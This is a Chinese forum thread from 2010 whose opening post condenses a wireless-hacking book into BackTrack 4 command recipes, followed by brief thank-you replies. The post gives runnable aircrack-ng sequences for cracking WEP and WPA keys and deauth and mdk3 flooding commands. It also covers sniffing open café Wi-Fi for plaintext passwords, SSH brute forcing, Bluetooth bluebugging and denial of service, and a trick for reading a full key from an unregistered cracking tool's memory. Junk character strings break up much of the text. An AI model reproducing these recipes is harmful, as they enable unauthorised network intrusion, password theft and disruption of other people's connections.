ubnt解决方案
查看: 14175|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

1306

回帖

3778

积分

439 小时

在线时间

少校

灌水天才

注册时间
2008-11-14
金币
2275 个
威望
7 个
荣誉
6 个
累计签到:14 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 10:59 |显示全部楼层
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
( |; f( W1 r) o; U% Z
2 K6 B( g. R7 w) R2 J以下所有操作均在BackTrack 4中进行。
4 \9 S2 g* v0 ?, s3 p: {( E6 e% B
( a- `) p5 Q8 ]' V, T4 O0 j
. N/ S6 n% q0 \- s+ b+ W- {, F无线WEP加密P解:. u- B4 l) N6 r5 K
) B7 j% a% G( {$ t8 I3 x- [3 B5 |8 {
注入P解:) d; ~* S0 T* o

6 U7 y& E7 B% V8 |3 fifconfig% U# ]6 _: `' N+ D0 k: S
. |  i) ~: F6 [" C  l
ifconfig –a" P+ N- Y' Y8 f$ B! [

2 n# {, p: `' ?+ b. a0 iifconfig wlan0(无线网卡) up. t' F2 A- r- u$ t8 i8 K/ [6 u0 C

1 ~! ^7 _+ A; v2 k! g/ ~. U8 h- fairmon-ng start wlan0
5 U( ?) `0 X7 `: `7 u7 \+ I2 z: Y/ i5 u! h3 R7 R
airodump-ng mon0
+ B* N. o) H1 E9 Y1 j
3 ~8 W+ S- i1 Zairodump-ng --ivs –w ivsfile –c 频道 mon0或3 L# q  X4 s9 F/ O/ @, ^* g3 S
& N5 ]8 R( }% ^/ R# X
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
+ z% S5 ]$ D4 \9 ]+ j- x, K5 T" H5 D; \
aireplay-ng -3 –b BSSID –h Station mon04 W( v" `$ N9 T% a& U' c  J
5 ~/ o$ l9 @1 _: m6 N  v: C
aircrack-ng ivsfile-01.ivs
% A/ w. l8 y8 \( b* c( ^# y6 ]8 |4 \# Z# i+ E
虚连接P解(适用于无客户端连接APP解)
( `$ ^$ u2 ^$ U, a, {9 i# P: c0 v) D# F& d* B/ F
ifconfig
4 `  c; }$ ^9 @/ ^6 t& ]" k# ]' ?0 o. L3 p
ifconfig –a" P% E6 s1 i# T( I* P8 ?3 p. V. `! x

, Z0 I' c. q% ~% lifconfig wlan0(无线网卡) up5 X& M9 I' k8 A9 A' Q" P

- |8 E% ?! H# ]$ z, |+ `: |airmon-ng start wlan0; W9 |1 Z% S; L8 y& ]9 y

" Y/ }: d5 N: Wairodump-ng mon0
) L9 W! y' \2 f* I
2 l$ N$ m3 ?  \8 S, Yairodump-ng --ivs –w ivsfile –c 频道 mon0或
+ F( H0 V6 t. p0 L! P* n! M: ?# G1 F- p4 G! H& P) @, F
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
4 Y- a( X+ A* B# K% I: q9 H
8 z+ Y) ~) w/ d3 ^aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
' I) R+ a! o/ W7 l* u) u4 @% B, @8 L7 r6 H8 \* {
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon07 @4 j0 a5 m2 E' |% P
7 Q* j% X+ U! d+ O, r4 A! b
aircrack-ng ivsfile-01.ivs
5 B: F) d  i) {/ a4 r! f% J( a/ G% K& \4 y1 L: }
  C% I/ C( ]7 ~) [0 V. i% N( @
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。" [6 }6 M( O  ?* @1 k
. W0 Q; l& x" n7 a' Y( B

) j! z, v% m) n& o" R4 g& pWPA-PSKP解& a0 @& E4 Y  \% S2 A
/ t9 p) H- o* l% j( I/ y
ifconfig
, F) |% v% J% L* B% r
  y. t9 ~9 ?' l: V8 b0 |ifconfig –a
! d' l& ~7 r0 f) l, e
5 `5 x+ t+ J! D% d4 b2 Bifconfig wlan0(无线网卡) up0 w& b; {( S1 V

' a/ A/ J% n# |; cairmon-ng start wlan08 u6 \! H# K* `0 O

& Q" \& \0 l) Xairodump-ng mon0
- P' ~* G2 C, E2 ?3 ]9 y5 b8 ^/ |& `  e" k  j0 ]
airodump-ng –w capfile –c 频道 mon0
  J  ]& W- E/ u7 r1 A9 S) h8 ]; D: z3 G$ o! v5 ~# @- v' |
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
( T, N! ^9 B6 L+ g
- u2 s- k; z' f) W! {aircrack-ng –w Dic capfile-01.cap或& ?* p3 r$ ]; B% e

+ l) ~- V/ Y2 Dcowpatty –f Dic –r capfile-01.cap –s SSID: N! Y# f' \% N; @% @# f

1 \1 n5 T% ]* }7 L& F2 C* Pcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
; l' w6 r% ^7 Y: b$ v7 y4 J1 a' Z5 N- a" D- U  b6 z  G) b+ T9 c9 R0 B
傻瓜式P解软件SpoonWPA。
+ g% I/ D' F4 K9 S9 ^1 \; B; c( H0 W
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst# Z3 I" }: x8 D7 s: ]
2 e' f) g' v% b$ a- F

8 @+ }  ]! {9 E9 X字典文件的生成和上传
' l* o' l7 k- o8 }/ U2 r
. ?* O: ?* P% f在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。' p  Q0 V* ?, W+ w0 R

8 w8 z. {* q4 Z% Z) G( R. }6 k. X3 `$ V0 o' t
BT4下开启Tftp:Services—TFTPD—start TFTPD
! M' k: J5 L4 J. \: Q) W/ C4 o& Y1 e' c+ s/ U
在Windows的CMD中运行 tftp –i IP put **.dic
" Y) W) y2 C: y- n# L4 m
7 r3 y4 W" ^: {! M8 P1 Y. G* f( i3 C0 T: X, v$ n8 ~- Y# i
BT4下开启SSH:Services—SSH—start SSH
7 M  s- _) O! L' ~7 M  s
. M; t' [$ U+ T3 x* V# yWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root: p/ W2 a" P9 n( U) A* a! D3 J3 o
# E6 H2 v+ \% Y: E$ v# e
/ }! K3 C' N+ ^( d
AP限制MAC时的解决
. I/ U9 W8 L8 Z$ {, |& X5 H$ J8 d9 J' n. B0 _2 |$ Q/ x+ _
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:+ C; k& c4 F$ j( \, L. ]- q# d% x
" g' L/ O% H# g  s% b6 o: m
ifconfig wlan0 hw ether NewMAC
3 U/ G4 t' z, R! P4 k: h, I/ \- {2 M/ C+ A+ ?2 B# v( s
/ F$ v7 u3 x' C9 c
关闭SSID广播的AP探测:* S6 K8 v% a) B3 F

4 w* s% c1 C8 }1.     Deauth攻击:
/ d! a! H* M1 d  ?; [# Y+ P
9 y0 J5 i4 ?5 f" B- sairodump-ng mon0
3 o3 I) z2 h6 N7 V: s4 c$ d
8 i" l8 ~# u6 u% C) w( R5 saireplay-ng -0 10 –a BSSID –h Station mon0# U+ q0 e; |- ?7 O) {* D6 K3 F2 P, u
1 K& }7 {: T7 }. g
2.     抓包分析
# U7 g( R+ [& S
/ s6 p; B& f0 N7 [Omnipeek
# B- |+ d( V* D0 Q% O
2 l) |* K2 o$ X& }3 uTcpdump –n –e –vvv –i 网卡名
1 o, [! k  E1 Z. ^
1 N0 J6 B" n+ ]4 G0 \! N, e3.     暴力P解
9 g" y; O) `+ p# k. a3 A$ C0 A7 S) X# ?0 T) ?# E
Charon 1.1暴力P解
  m  G6 d- R3 V0 [
' z" J+ v# Y" s. Z  I- Y7 |& q( X7 O- S. d' Q
无线加密数据包的解密
$ }0 a/ h% v, P9 d& k, D
- F% z4 }7 v+ f) m: G# N* f5 q7 a. \  g2 v; i7 u/ {' d( X: h0 e
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
" E# t8 e9 B: ^8 }' w# g0 |
4 u) e* L. C5 o* F$ @" X& yFilterNS     DNS解析数据包
. F8 C) V4 b- K1 h: v8 r/ f7 M( z# W' b
Filter:HTTP    WEB访问数据包- l) X( s- W  `$ b; f- Y' g

' n2 F3 O6 M+ S% SFilter:msnms   MSN
/ \3 ^5 K7 c+ F& l" G/ m! F* M8 R1 q: A, ?) q* u
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。: }6 T* F& N/ d7 n2 n% \. a8 Y" g
" [$ A8 x; J& O# k- ^
使用airdecap-ng解密:+ b, v& h- d' z

$ F# c! \2 e) [3 D6 q: d6 JAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap  Y9 t2 b  t8 Z
5 ~- v- I+ }9 J! m5 L) b5 G9 v# S

* e2 A- N/ y  O: A- f9 H- h  D! ?咖啡馆中无线数据截取(开放式无加密AP)" p7 H3 L% P7 E; t! \! c
6 G- C$ O- B7 X. ^4 |1 k2 Q! ^
1.Airodump-ng –w data –c频道 mon0
7 s8 R8 }2 `( W" }! r0 v4 R0 l- f$ A& j6 x2 }3 k& _/ k6 S
2.使用WireShark打开分析
3 J4 W( @( B$ [# T2 q& \6 _3 w0 J0 P

# D+ m5 f4 ~; \; b3 g) sBT4下的渗透工具:
- V7 S; d$ V; g6 {
  u' d' ~2 `7 o2 y7 Fnmap –sP IP/24        判断C段下存活的主机 : M) G" d+ U' {3 k, G

: l! b! W2 y. r: d$ e+ Tnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
# }0 J: e# f8 J% }4 H- m/ \* I9 L# M
nmap –vv –sV IP –p port   指定端口的详细信息。。。; b2 N8 `! P# E1 V5 j$ Z# |

! ]( c; t& j& H. }namp –O IP/24    判断主机的系统版本
. E( c' p9 {. [/ H, z- Z2 C; h  ?" a  c( P2 ?, R4 T6 c, B

) S) h2 m7 G$ FGUI 版nmap:Zenmap ( u! P+ V$ O2 Z  {8 R
! t9 C7 O# d" q- x0 [! r

# e, B2 e1 p% Q( k& DAmap使用:amap –B IP port
6 k& R" X% J) z+ ~, U% j+ n% S. |
Nbtscan(扫描Windows网络NetBios信息):
# F* V: E- k- P  W  r) W
0 f3 T) k9 h2 J3 ?: |/ g1 jnbtscan –v –s : IP/24" Z; r; }3 ?3 h1 N" G- H
& J) _% @1 v7 `2 L# N
nbtscan –r IP
1 Y9 l- |# @$ H- s
7 r* j4 I: q( J9 k9 V& p2 G  q+ r- \$ O8 e+ B' q2 m$ V
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
$ X2 ^; }+ d% {9 n- u, A
# t! n9 ]# {7 p+ r1 {& w1 O8 M( N# ^3 J. V- L7 N
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
9 s  x+ [: A. P- O% E4 ]$ E! g! ]/ Y' A+ M8 \
BruteSSH: ./bruthe.py –h IP –u Username –d Dic4 W! i& C7 w1 x( k! K0 u
# |& V" F7 [+ K1 l* A" r/ {
Metasploit3使用
5 i, g" z5 W" z无线D.0.S
. C- o/ `6 U1 A6 Q- m
- z8 T9 \3 L6 O+ W
7 h0 Q0 p# S/ @& ]Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
! _9 c" Y9 j1 J/ M- |! G% _/ [$ z8 o+ ~, C
airmon-ng start wlan0% L' V7 G+ Y5 p; ]( J" q5 M
# c( x# l* X  }6 V4 b
airodump-ng mon01 H- z7 `% }8 q, M. p2 T
: z3 Q7 I7 C7 {3 y* ~* P
mdk3 mon0 a –a BSSID
; a  i& Z+ G) F/ `7 M) z: M8 k0 O
对所有的AP攻击:mdk3 mon0 a
* E. a& x/ D& ^( Y  _' _8 ^2 r$ v* [8 O6 \+ E

* x  c' a7 u, a4 b0 Y+ eDeauth Flood 攻击; D) H( Z# D+ @9 ?0 G5 M7 @5 `- j
7 B% D5 y3 [8 b) U* V
mdk3 mon0 d –c Channel9 E/ T% f* a( f2 e/ R1 d
- u0 ?7 t# B$ z+ K) a9 }* q; A
图形化D.O.S攻击:Charon" j% |" e9 ]" C( L, n8 z( I
* y- G2 L6 n/ u+ b) n9 z

0 U- y4 G+ f% J- e4 c当受到攻击时,使用Wireshark抓包可以看到异常信息。
* g4 R" Y3 G0 N& u( b/ z" b6 e; x- `* o; h/ @+ I2 {

3 R' ~1 F9 G$ q* uWPA-PSK高速P解
* A1 L4 g; j3 `% M. @
6 m& i2 _2 x3 j0 Y+ U1.       WPA-PSK PMK Hash TablesP解
+ X0 I* T$ o9 T# m: b3 }  K( |8 v( I! @# k# D( e- D
Cowpatty –d HashTable.hash –r ***.cap –s SSID# P, k6 ?0 o& q. d9 W& q
) b0 P6 @0 A5 O3 r9 ^0 s- `5 p. {
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
8 y, [6 B$ m0 Q# K$ X/ _- M  m
" L7 k  R! i0 [" x# D5 ^3 R$ }/ Q2.       GPU辅助高速P解
+ |0 b6 D# F) K- c+ u, g& a; |3 f: M% C3 I% R- D' z& n) S0 t
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。" [9 q% ?, o8 Y' |& m0 Y5 l

: \3 T7 R' K% v: T; @; g2 u: t3.       分布式P解
( E4 L  a: x! {1 c) g9 h8 T1 W
# m1 T( p% {5 z9 [; f- p% z  y( N/ E  z; b" ^% o3 v( t
AP的伪造
% w" b0 Y/ ?) V8 O0 R  }- W/ v. j! Y4 Q$ p
把AP的MAC改成目标AP的MAC
) Z2 F( V/ x; f, ?- `; {. |1 v3 ~. Q1 @
网卡软AP9 Y( ~! B5 G  m% f; B

/ v1 h& n( O. H  ?: K% `( B$ Z  _! ~/ w: M$ B) b: H3 k
伪造大量虚假AP信号:* s* E1 x3 ], a" w1 x
- t, M8 _- C1 ]$ c7 l: ?
随机SSID:mdk3 mon0 b –g –c 频道 3 i* B8 Q0 H& e% f/ e

/ ?  T% p/ e; A( f% L指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度/ y9 d% U4 S2 I. W. [! e
% y5 D9 J, {6 e

9 w- z" y( i- A5 d7 d; G) EWar-Driving
, h  \; t! q; a0 A  K+ u
/ P; d" W" i4 X8 @热点地图绘制
. a  F- H) P( y! X; s0 r6 q
& w: c" A9 q& hWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。' Z8 R8 z. O- l  l% t* v( F0 K
( c% g+ P) _5 D2 _  c2 [
: j  F  a% {. V/ o! e
Netstumble" O9 U8 ?  u- Q0 P

, v4 D: t7 y( f0 h/ i+ q) ^, s1 ?9 y2 L- r3 o9 G7 }7 H: a
蓝牙Hacking& `3 Y, ~: _' p* z8 E

, \/ Z- {9 u' EWindows下的Blue Soleil工具4 J$ z9 b7 ~) z1 c
6 t  _/ U# \* x/ z! S  r9 w
BT4:' K; q3 w8 X* X4 g- ^
" w3 C; w0 T/ y/ d
hciconfig 查看蓝牙适配器4 m6 S" o' j4 B0 `1 X) w
+ |  y" Q# a1 u! f3 X* e) e
hciconfig hci0 up 载入蓝牙适配器
! B2 d( K- c; x  b# C0 ~0 U/ x3 V7 Y4 {4 ]# V' X
hciconfig hci0 class 蓝牙适配器详细信息( ?1 O( r2 K9 f6 X( D# r
8 M7 n( O8 y! b

* R* Q2 i) z* z1 ]hcitool(扫描蓝牙)7 {4 o# E3 P$ c  ]2 H
4 P3 W4 P% q6 Y/ t
hcitool –i hci0 scan9 N/ S4 x% I( J- T

$ G3 v  @. w- R5 w' @$ I" a9 \BTscanner(扫描蓝牙)9 C7 i* c; t. D

- D4 m+ s& j2 ^1 e2 }) j% a3 i# h1 G( x* w( |7 J1 R
蓝牙攻击:: X# B( |" `3 I9 H0 H0 v& J9 P+ ]

2 {. l  u. M5 G  }* z" tBlueBugging (适用于BlueTooth V1.1的手机)
& R; I6 C. n  X* J" u' m. Y, x4 [; Q. p
Bluebugger工具:* H3 ?! X: @+ r
+ i% [% B: t. d7 P0 b9 z( l
Bulebugger –a HD_Addr info$ L4 o5 t3 m. V9 p* l. J
  S; X4 z: A) j& c# F2 |: `2 ]
* |) h! J6 ?$ g! P! _- V
BlueJacking; L9 e5 g1 u: S% ]  M. v& Q

* n7 a- f" U* Y& n实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
$ D' F3 g/ s7 ~. n4 i
. t& R% r3 y; a; a
# F& ?+ s; _0 S3 A) OHD_Addr修改:  A2 |0 {( M6 F- y' @

+ ~1 f/ ?0 y9 s+ T% s5 x; A( z5 JBdaddr工具5 k! W; `, G2 T5 I6 Z+ b% t4 e. I$ C
9 S( J& s+ k. B7 z- I
bdaddr –i 蓝牙设备名 新HD_addr
) |1 @  v. L' v
" ?# @  Q0 N: Y; E. i1 a! @# m. P3 ]6 w% [1 Z% p1 o
蓝牙D.O.S8 g8 d0 J, V0 A# e+ f2 O  }2 ]

7 H% e; u  c) s1 }& k# r8 G! pl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
' G" M! a( c" L8 G+ R( K& P! W4 E0 Z; F/ t
hciconfig
  g) P4 \5 j& }+ k$ r! P' o
& L9 S# r$ u. ~* }1 p4 ehciconfig hci0 up
. m' V. o2 e* G6 L$ T4 F# x: G/ Y2 `9 e: j5 H+ r0 i
hcitool –i hci0 scan& u/ i% s4 Y. x0 {
: k" |( j! ]2 e5 L1 z# m- X& Y) F0 X
l2ping –s 10000 –目标MAC' X6 h6 T. f" }. q
- r, n% _' v. @0 J5 a
+ l3 r1 y6 X( x+ e1 i. {
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)  ^7 D" y& y1 U+ D  s; W9 Y
* r. ?# h' j1 d4 e) [; {: D! S* a
./fang –r ************-############ -s
8 k8 \9 C' d# Z9 i& _
; h7 Z! S( N! s5 d, }- y/ f  z暴力P解************-############的蓝牙设备
: V. ^; W3 ?3 |
8 C) I4 s1 B1 |% I9 ^0 v./fang –l 各厂商BD_Addr分配, q8 N7 U+ f/ G! y7 s4 y+ Y

4 [! h4 d  H/ `  i, T4 H/ \
$ H- n0 s/ H2 y' MWifiZoo使用$ j: D% I1 T( k

) U9 i0 S+ y3 t; u7 j9 _./wifizoo.py –c Capfile
( q# K$ Y% ~: t* i: J  O3 D% H- u
* ^3 N2 ^  i% `( K6 Y访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

176

回帖

850

积分

49 小时

在线时间

中尉

注册时间
2009-10-19
金币
656 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

56

回帖

143

积分

10 小时

在线时间

上等兵

注册时间
2008-12-18
金币
86 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

374

回帖

2298

积分

114 小时

在线时间

少校

注册时间
2009-7-5
金币
1841 个
威望
8 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

561

回帖

1138

积分

25 小时

在线时间

上尉

注册时间
2010-1-28
金币
566 个
威望
0 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

111

回帖

262

积分

61 小时

在线时间

少尉

注册时间
2010-2-6
金币
131 个
威望
2 个
荣誉
0 个

尚未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

70

回帖

763

积分

36 小时

在线时间

中尉

注册时间
2008-3-8
金币
687 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

266

回帖

960

积分

539 小时

在线时间

中尉

注册时间
2010-2-20
金币
592 个
威望
5 个
荣誉
1 个
累计签到:13 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

57

回帖

92

积分

14 小时

在线时间

上等兵

注册时间
2010-1-25
金币
32 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。* T7 ]. j+ C; w7 k$ @
借来看看。
回复

使用道具 举报

52

回帖

159

积分

19 小时

在线时间

上等兵

注册时间
2009-6-29
金币
103 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
! K0 f& x( N- c: k呵呵 其实也不贵 21块 快递再一点
2 H; b" z( i+ t- a1 @, K我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

289

回帖

449

积分

105 小时

在线时间

少尉

注册时间
2010-1-14
金币
134 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

22

回帖

157

积分

7 小时

在线时间

上等兵

注册时间
2010-2-25
金币
134 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-4-26 11:19

返回顶部 返回列表